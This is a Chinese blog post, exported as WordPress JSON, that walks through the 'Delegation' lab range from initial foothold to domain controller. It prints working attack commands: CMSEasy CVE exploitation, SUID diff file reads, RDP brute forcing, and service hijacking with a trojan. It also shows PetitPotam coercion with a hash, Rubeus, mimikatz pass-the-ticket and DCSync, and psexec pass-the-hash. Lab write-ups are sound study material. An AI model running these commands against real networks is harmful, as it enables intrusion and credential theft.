{"id":274,"date":"2023-09-12T10:20:51","date_gmt":"2023-09-12T02:20:51","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=274"},"modified":"2023-09-12T10:20:51","modified_gmt":"2023-09-12T02:20:51","slug":"%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95-delegation","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/274","title":{"rendered":"\u6625\u79cb\u4e91\u5883\u9776\u573a\u8bb0\u5f55-Delegation"},"content":{"rendered":"

\u5165\u53e3<\/p>\n

\"\"<\/p>\n

\u7aef\u53e3\u626b\u63cf<\/p>\n

\"\"<\/p>\n

80\u7aef\u53e3\u7684easycms\u8bd5\u4e86\u4e00\u4e0b\/admin\u8fdb\u5165\u4e86\u540e\u53f0\u767b\u5f55\u754c\u9762\uff0c\u8bd5\u4e86\u4e00\u4e0b\u5f31\u53e3\u4ee4admin:123456\u6210\u529f\u767b\u5f55<\/p>\n

\u53f3\u4e0a\u89d2\u70b9\u5347\u7ea7\u67e5\u770bcmseasy\u7248\u672c\uff0c\u627e\u5230\u662fV.7752 [ 7_7_5_20210919_UTF8 ]<\/p>\n

cve-2021-42643<\/a>\u76f4\u63a5\u62ff\u4e0b<\/p>\n

\"\"<\/p>\n

\u76f4\u63a5\u5c31\u662f\u4e00\u4e2a\u8681\u5251\u8fde\u63a5<\/p>\n

\u7b80\u5355\u679a\u4e3e\u53d1\u73b0diff\u6709suid\u6743\u9650<\/p>\n

\u76f4\u63a5\u8bfbflag1<\/p>\n

diff --line-format=%L \/dev\/null \/home\/flag\/flag01.txt<\/code><\/pre>\n
\"\"<\/p>\n
\u548c\u4e00\u4e2a\u63d0\u793a<\/p>\n
WIN19\\Adrian<\/code><\/pre>\n
\u8fd8\u6709\u4e00\u884c\u53ef\u80fd\u662f\u5728\u63d0\u793arockyou.txt\u7206\u7834\u4ec0\u4e48\u4e1c\u897f<\/p>\n
\u5148ifconfig<\/p>\n
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\n        inet 172.22.4.36  netmask 255.255.0.0  broadcast 172.22.255.255\n        inet6 fe80::216:3eff:fe22:ff97  prefixlen 64  scopeid 0x20<link>\n        ether 00:16:3e:22:ff:97  txqueuelen 1000  (Ethernet)\n        RX packets 50302  bytes 68812811 (68.8 MB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 14375  bytes 5096164 (5.0 MB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\nlo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\n        inet 127.0.0.1  netmask 255.0.0.0\n        inet6 ::1  prefixlen 128  scopeid 0x10<host>\n        loop  txqueuelen 1000  (Local Loopback)\n        RX packets 722  bytes 62319 (62.3 KB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 722  bytes 62319 (62.3 KB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0<\/code><\/pre>\n
\u4f20fscan\u626b\u5185\u7f51<\/p>\n
start infoscan\ntrying RunIcmp2\nThe current user permissions unable to send icmp packets\nstart ping\n(icmp) Target 172.22.4.7      is alive\n(icmp) Target 172.22.4.45     is alive\n(icmp) Target 172.22.4.36     is alive\n(icmp) Target 172.22.4.19     is alive\n[*] Icmp alive hosts len is: 4\n172.22.4.19:139 open\n172.22.4.45:139 open\n172.22.4.7:139 open\n172.22.4.19:135 open\n172.22.4.45:135 open\n172.22.4.7:135 open\n172.22.4.45:80 open\n172.22.4.36:80 open\n172.22.4.36:22 open\n172.22.4.36:21 open\n172.22.4.7:88 open\n172.22.4.36:3306 open\n172.22.4.19:445 open\n172.22.4.45:445 open\n172.22.4.7:445 open\n[*] alive ports len is: 15\nstart vulscan\n[*] NetInfo:\n[*]172.22.4.45\n   [->]WIN19\n   [->]172.22.4.45\n[*] NetInfo:\n[*]172.22.4.19\n   [->]FILESERVER\n   [->]172.22.4.19\n[*] NetInfo:\n[*]172.22.4.7\n   [->]DC01\n   [->]172.22.4.7\n[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 \n[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)\n[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 \n[*] NetBios: 172.22.4.45     XIAORANG\\WIN19                 \n[*] WebTitle: http:\/\/172.22.4.36        code:200 len:68068  title:\u4e2d\u6587\u7f51\u9875\u6807\u9898\n[*] WebTitle: http:\/\/172.22.4.45        code:200 len:703    title:IIS Windows Server<\/code><\/pre>\n
\u56db\u53f0\u673a\u5668<\/p>\n
172.22.4.7      DC\n172.22.4.45     WIN19\n172.22.4.36     \u62ff\u4e0b\n172.22.4.19     fileserver  <\/code><\/pre>\n
\u5355\u72ec\u626b\u4e86\u4e00\u4e0bwin19\u8fd9\u53f0\u673a\u5668\u7684\u5168\u7aef\u53e3\uff0c\u53d1\u73b0\u5f00\u4e863389\uff0c\u7528rockyou\u7206\u7834\u4e0brdp\u5bc6\u7801\u76f4\u63a5<\/p>\n
\u5509\uff0c\u6c99\u783e<\/p>\n
\u7206\u51fa\u6765\u5bc6\u7801\u662fbabygirl1\uff0c\u4f46\u662f\u8fc7\u671f\u4e86\uff0c\u76f4\u63a5rdp\u8fc7\u53bb\u624b\u52a8\u6539\u5bc6\u7801<\/p>\n
\u684c\u9762\u4e0a\u4e00\u4e2aprivescheck\uff0c\u8bbe\u7f6e\u91cc\u9762\u5df2\u7ecf\u6709\u626b\u8fc7\u7684\u7ed3\u679c\u4e86\uff0c\u76f4\u63a5\u770b<\/p>\n
\u4e00\u5bf9none\u91cc\u9762\u6709\u4e24\u4e2ahigh\uff0c\u4e00\u773c\u4e01\u771f\uff0c\u8fd9\u4e2a\u670d\u52a1\u7684\u6ce8\u518c\u8868\u968f\u4fbf\u6539<\/p>\n
\"\"<\/p>\n
\u76f4\u63a5viper\u8bbe\u7f6e\u7aef\u53e3\u8f6c\u53d1\uff0c\u628a172.22.4.36\u7684\u7aef\u53e3\u8f6c\u53d1\u5230vps\u91cc\u9762\u63a5\u53d7windowsshell\u7684\u7aef\u53e3\uff0c\u518d\u751f\u6210\u4e00\u4e2a\u9a6c\u518d\u628agupdate\u670d\u52a1\u542f\u52a8\u7684\u53ef\u6267\u884c\u6587\u4ef6\u8def\u5f84\u6539\u6210\u8fd9\u4e2a\u9a6c\u7684\u8def\u5f84\uff0c\u7136\u540e\u76f4\u63a5\u542f\u52a8\uff0c\u4e0a\u7ebfsystem<\/p>\n
sc.exe start gupdate<\/code><\/pre>\n
\u62ffflag2<\/p>\n
\"\"<\/p>\n
\u4f46\u662f\u5f88\u5947\u602a\uff0c\u6bcf\u6b21\u670d\u52a1\u542f\u52a8\u90fd\u4f1a\u5728\u51e0\u5341\u79d2\u5185\u505c\u6389\uff0c\u7206\u8fd9\u4e2a\u9519<\/p>\n
\"\"<\/p>\n
\u4e8e\u662f\u76f4\u63a5\u4e58\u4e0a\u7ebf\u7684\u51e0\u5341\u79d2\u5185\u8fc5\u901f\u7684\u5728viper\u91cc\u9762\u518d\u6b21\u6267\u884c\u4e00\u4e0b\u4e4b\u524d\u7684\u9a6c\uff0c\u8fd9\u624d\u7a33\u5b9a\u4e0a\u7ebf\uff0c\u4ee4\u4eba\u611f\u53f9<\/p>\n
msf\u91cc\u6293\u4e00\u624bhash\u6ca1\u4ec0\u4e48\u6709\u7528\u7684\uff0c\u4f46\u662f\u770b\u5230admin\u684c\u9762\u4e0a\u6709\u4e00\u4e2afinalshell\u7684\u5feb\u6377\u65b9\u5f0f\uff0c\u4e8e\u662f\u5efa\u4e2a\u65b0\u7684admin\u8d26\u6237\u53bb\u770b\u770b<\/p>\n
\u597d\uff0c\u4e5f\u6ca1\u770b\u51fa\u5565\u6765<\/p>\n
\u5148bloodhound\u4e00\u6ce2\uff0c\u518d\u6839\u636e\u9776\u573a\u540d\u53ebdelegation\uff0c\u53ef\u4ee5\u770b\u5230WIN19\u5141\u8bb8\u975e\u7ea6\u675f\u59d4\u6d3e<\/p>\n
\u76f4\u63a5\u53bb\u4e0a\u6b21\u7684\u6587\u7ae0\u91cc\u627e --> https:\/\/zhuanlan.zhihu.com\/p\/549838653?utm_id=0<\/a><\/p>\n
\u4f46\u662f\u91cc\u9762\u7684\u65b9\u6cd5\u4f3c\u4e4e\u4e0d\u592a\u53ef\u7528\uff0c\u6ca1\u6709\u7968\u636e\uff0c\u4f46\u662f\u53c8\u627e\u5230\u4e86\u8fd9\u4e2ahttps:\/\/blog.csdn.net\/m0_75218183\/article\/details\/131084165<\/p>\n
\u76f4\u63a5\u7167\u505a<\/p>\n
.\\Rubeus.exe monitor \/interval:1 \/filteruser:dc01$ (\u7ba1\u7406\u5458cmd)<\/code><\/pre>\n
\u7136\u540e\u5f3a\u5236\u8ba4\u8bc1\u6709\u597d\u51e0\u79cd\u65b9\u5f0f<\/p>\n
--> https:\/\/forum.butian.net\/share\/1944<\/a><\/p>\n
python3 PetitPotam.py -u 'WIN19$' -d xiaorang.lab -hashes :1d90c0f8cf156e1b5e23354f35397984 -dc-ip 172.22.4.7 172.22.4.45 172.22.4.7<\/code><\/pre>\n
\u62ff\u5230\u7968\u636e<\/p>\n
\"\"<\/p>\n
\u89e3base64\u4e4b\u540e\u76f4\u63a5\u4fdd\u5b58\u4e3a1.kirbi\uff0c  \u8d77\u4e2aadmin\u6743\u9650\u7684mimikatz\u5bfc\u5165<\/p>\n
kerberos::ptt 1.kirbi\nkerberos::list<\/code><\/pre>\n
\u7136\u540edcsync\u62ffhash<\/p>\n
lsadump::dcsync \/domian:xiaorang.lab \/all \/csv<\/code><\/pre>\n
\"\"<\/p>\n
\u62ff\u5230\u57df\u7ba1hash\u76f4\u63a5\u6a2a\u5411\u62ff\u57df\u63a7flag<\/p>\n
python3 .\/tools\/impacket-0.10.0\/examples\/psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 Administrator@172.22.4.7<\/code><\/pre>\n
\"\"<\/p>\n
\u518d\u6a2a\u5411\u53bbfileserver\u62ffflag3<\/p>\n
python3 .\/tools\/impacket-0.10.0\/examples\/psexec.py -hashes :4889f6553239ace1f7c47fa2c619c252 xiaorang.lab\/Administrator@172.22.4.19<\/code><\/pre>\n
\"\"<\/p>\n","protected":false},"excerpt":{"rendered":"
\u5165\u53e3 \u7aef\u53e3\u626b\u63cf 80\u7aef\u53e3\u7684easycms\u8bd5\u4e86\u4e00\u4e0b\/admin\u8fdb\u5165\u4e86\u540e\u53f0\u767b\u5f55\u754c\u9762\uff0c\u8bd5\u4e86\u4e00\u4e0b\u5f31\u53e3\u4ee4admin:123456\u6210\u529f\u767b\u5f55 \u53f3\u4e0a\u89d2\u70b9\u5347\u7ea7\u67e5\u770bcmseasy\u7248\u672c\uff0c\u627e\u5230\u662fV.7752 [ 7_7_5_20210919_UTF8 ] cve-2021-42643\u76f4\u63a5\u62ff\u4e0b \u76f4\u63a5\u5c31\u662f\u4e00\u4e2a\u8681\u5251\u8fde\u63a5 \u7b80\u5355\u679a\u4e3e\u53d1\u73b0diff\u6709suid\u6743\u9650 \u76f4\u63a5\u8bfbflag1 diff –line-format=%L \/dev\/ […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,3],"tags":[],"class_list":["post-274","post","type-post","status-publish","format-standard","hentry","category-wp","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/274","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=274"}],"version-history":[{"count":1,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions"}],"predecessor-version":[{"id":275,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/274\/revisions\/275"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}